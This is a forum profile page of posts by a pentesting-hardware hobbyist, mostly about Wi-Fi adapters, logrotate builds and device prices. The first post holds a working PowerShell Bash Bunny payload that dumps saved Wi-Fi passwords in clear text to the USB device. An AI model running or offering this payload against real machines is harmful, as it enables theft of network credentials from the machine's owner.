Jump to content

DataHead

Active Members
  • Posts

    347
  • Joined

  • Last visited

  • Days Won

    11

Posts posted by DataHead

  1. this is old, but..

     

    does the following work for you?

    $'$Bunny = (gwmi win32_volume -f \'label=\'\'BashBunny\'\'\' |  Select-Object -ExpandProperty DriveLetter)
    (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File $Bunny\loot\WiFiCreds\WiFi.txt'

    Dollar qoutes $' ' for this purpose should work, only \ escaping your ' characters.

    >echo $'isn\'t this easier?'
    >isn't this easier?

     

  2. I don't give a crap who you are, this...

    Is...

    exciting!!!

    I want to see what this deliciously sexy beast is, and what it's all about! I Demand more of this nerd porn!!!

    Maybe that's a bit too far.. but I can only imagine what this doodad is, what it features, improvements etc. Something with a nice design like that, screams goodness :-) can't wait to hear all about it!

  3. Eh, no. Not any.. It will have to be cross compiled. It needs to be the same architecture configuration

    i have cross compiled version 3.8.1 ( not sure if you require the lower version, nor do i know if any is avail on the repos )

    just after you download it, rename the .zip extension to .ipk. as the forum restrictions do not accept files with the .ipk externsion.

    logrotate_3.8.1-1_ar71xx.zip

    EDIT:

    screw it, here's 3.9.1 and 3.7.1

    logrotate_3.9.1-1_ar71xx.zip

    logrotate_3.7.1-1_ar71xx.zip

  4. Alfa AWUS036NEH is 5 Ghz. And with a directional antenna you could go "pretty far".

    I remember watching a video where they just used a normal router, a normal wifi dongle and hooked both of them up with directional antennas.

    I believe it went for miles. It was a couple of years ago though.

    The NEH is not supportive of 5ghz. It supports 2.4ghz wireless-n, but is not 5ghz.

    Also, remember that 5ghz will not travel as far as 2.4ghz can. but 5ghz supportive, will give a better connection experience.

  5. It did say from defcon, which maybe there are some defcon gadget collectors. But even still, I looked at prices other pineapples are going for, and the just with a pineapple and the AWUS036NEH adapter sold for near $300 on ebay. And seen a mkv with no antennas, no sdcard and no power supply, sell for $200.

  6. Note how in the screenshot the UI is horribly broken? Note how he is using IE?

    I do see that, yes. Though not recommended or supported to use IE, i had seen that the "show" link should be "hide" if he did click it and it was properly functioning ( doubtful because as you stated, is broken ), in case he does go to another browser, and has the same problem.

×
×
  • Create New...